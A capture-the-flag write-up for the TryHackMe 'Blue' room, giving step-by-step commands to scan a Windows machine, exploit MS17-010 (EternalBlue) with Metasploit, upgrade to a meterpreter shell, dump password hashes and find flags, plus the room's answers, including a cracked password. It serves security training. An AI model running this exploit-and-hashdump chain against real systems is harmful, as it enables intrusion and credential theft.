tryhackme Blue write-up
- Name: Blue
- Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
- Room: tryhackme.com
[Task 1] Recon
Scan the machine
First we need to scan the machine to check for available ports and services
sudo nmap -sS -A <machine_ip>
Question: How many ports are open with a port number under 1000?
Answer: 3
Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
“We can check the security problems of a device using scripts in Nmap, for example vuln script can identify common problems”
nmap <machine_ip> — script vuln
The machine seems to be vulnerable to the ms17–010 exploit
Answer: ms17–010
[Task 2] Gain Access
Start Metasploit
We know that the machine has a security problem and we can use Metasploit to exploit it
msfconsole
The next step is to find the appropriate exploit for the security problem (ms17–010)
search ms17–010
Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Answer: exploit/windows/smb/ms17_010_eternalblue
We have to select the desired exploit and set the required values
use exploit/windows/smb/ms17_010_eternalblue
and
show options
Set the Machine IP
set RHOSTS <machine_ip>
Question: Show options and set the one required value. What is the name of this value? (All caps for submission)
Answer: RHOSTS
Run the exploit
You can see now that our exploit was executed and that we got a Windows host shell. In order to continue, we must use the Meterpreter shell to execute commands and upload files.
[Task 3] Escalate
We need to turn the shell into a meterpreter
background
and
use post/manage/shell_to_meterpreter
Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer: post/multi/manage/shell_to_meterpreter
List the sessions and set the session number.
sessions -l
and
set SESSION 1
Question: Select this (use MODULE_PATH). Show options, what option are we required to change?
Answer: SESSION
Now if we see the sessions again, a session meterpreter has been added
sessions -l
sessions 2
We got the meterpreter shell so now we can interactive shell to the attacker from which to explore the target machine and execute code.
Use ps command to list all the process that is running in the host system.
ps
[Task 4] Cracking
Use hashdump to dump the user credentials
hashdump
Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Answer: Jon
Use the above link to crack the password hash or else you could crack the hash using hashcat or John with rockyou.txt.
Question: Copy this password hash to a file and research how to crack it. What is the cracked password?
Answer: alqfna22
[Task 5] Find flags!
search the flags using :
search -f flag*.txt
thank you 🌏🔥